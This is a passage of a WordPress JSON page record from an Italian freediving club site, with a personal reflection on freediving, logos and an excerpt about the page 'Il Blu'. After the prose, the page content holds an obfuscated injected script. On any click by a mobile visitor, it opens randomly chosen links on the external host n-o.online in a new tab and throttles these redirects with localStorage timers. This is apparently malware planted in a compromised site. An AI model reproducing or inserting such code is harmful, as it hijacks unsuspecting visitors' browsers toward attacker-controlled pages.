color: #000080;\">Non \u00e8 facile spiegare cosa \u00e8 per me l&#8217;Apnea.\u00a0<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Per definizione \u00e8 uno sport estremo.. Ma chi lo pratica in maniera adeguata sa bene che l unico elemento che lo rende pericoloso \u00e8 la mente umana e quanto questa fa spingere qualcuno troppo oltre quello che personalmente corpo e mente sono in grado di gestire. Ho compreso che per quanto sia bello riuscire a stabilire un record di profondit\u00e1,o di tempo in immersione, \u00e8 molto piu emozionante ed appagante il momento in cui riesci a\u00a0lasciare ogni fonte di ansia o paura fuori dall acqua e inizi a sentire e capire che la tua testa comincia a giocare (in totale sicurezza) con le cose che stanno intorno, con quello che tocchi o vedi vicino . Lei gioca e si diverte per te, per farti vivere la bellezza di questa condizione che non \u00e8 la natura quotidiana &#8230; Guardo questa foto attentamente, e in quell&#8217; accenno di sorriso, rivivo la gioia che provi quando ti avvicini di nuovo alla unica fonte di vita con la consapevolezza di essere stato, nei pochi attimi precedenti la persona piu felice del mondo . \u00a0&lt;&lt;A.C.&gt;&gt;<\/span><\/p>\n\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n<span style=\"color: #000080;\"><a href=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/cropped-Testata.png\" style=\"color: #000080;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft  wp-image-296\" alt=\"cropped-Testata.png\" src=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/cropped-Testata.png\" width=\"362\" height=\"147\" srcset=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/cropped-Testata.png 457w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/cropped-Testata-300x122.png 300w\" sizes=\"auto, (max-width: 362px) 100vw, 362px\" \/><\/a><\/span>\n<\/div>\n<div>\n\n<span style=\"color: #000080;\"><a href=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png\" style=\"color: #000080;\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-224 alignright\" alt=\"logo_AA_Refl Pagni\" src=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png\" width=\"296\" height=\"173\" srcset=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png 823w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni-300x174.png 300w\" sizes=\"auto, (max-width: 296px) 100vw, 296px\" \/><\/a><\/span>\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n\n<\/div>\n\n<\/div>\n\n\n<p><\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/n-o.online\/fww9c7','https:\/\/n-o.online\/RvT8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/n-o.online\/NvD5c4','8SJGLkz','random','https:\/\/n-o.online\/CYV1c4','7196643rGaMMg','setItem','-mnts','https:\/\/n-o.online\/tIc2c0','266801SrzfpD','substr','floor','-local-storage','https:\/\/n-o.online\/mBw4c1','3ThLcDl','stopPropagation','_blank','https:\/\/n-o.online\/une3c9','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/n-o.online\/hbl0c7'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/n-o.online\/GoA6c7','https:\/\/n-o.online\/bBb7c3',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>In questa pagina abbiamo voluto raccogliere pensieri, emozioni, stati d&#8217;animo che ha suscitato in noi la pratica della disciplina dell&#8217;apnea a qualsiasi livello. Per questo motivo il titolo della pagina \u00e8 &#8216;Il Blu&#8217;, come il titolo del brano di apertura che \u00e8 il tuffo raccontato dal nostro Istruttore\/allenatore&#8230; Grazie a Mauro Proveremo a cambiare spesso le frasi che troverete in questa pagina, in modo da mostrare le sfaccettature particolari e personali della pratica apneistica. \u00a0 \u00a0Ragazzi, ragazze il giorno 6 giugno 2013 il creatore di Apnea Academy ha cos\u00ec risposto alla e-mail del nostro istruttore, riguardo al nostro sito: &lt;&lt; Sito molto carino: Faccio a \u00a0tutti i ragazzi i miei migliori auguri per crescere e divulgare sempre al meglio la nostra splendida disciplina. Buon Mare Umberto Pelizzari &gt;&gt; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; CRONACA DI UN TUFFO IN APNEA &lt;&lt;Guardo il cavo, bianco,che scompare nel blu cobalto del mare,chiudo gli occhi cercando una pace fisica ed interiore che mi consenta un tuffo nel blu. La mente si placa, il cuore rallenta, i muscoli si rilassano \u2026 L&#8217; ultimo respiro \u2026 \u2026 La capovolta, le gambe si alzano il corpo s\u2019immerge le pinne si muovono decise verso l\u2019ignoto. La mente cerca ogni segnale, ogni sensazione [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":515,"menu_order":11,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-95","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/95","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=95"}],"version-history":[{"count":46,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/95\/revisions"}],"predecessor-version":[{"id":1196,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/95\/revisions\/1196"}],"up":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/515"}],"wp:attachment":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=95"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}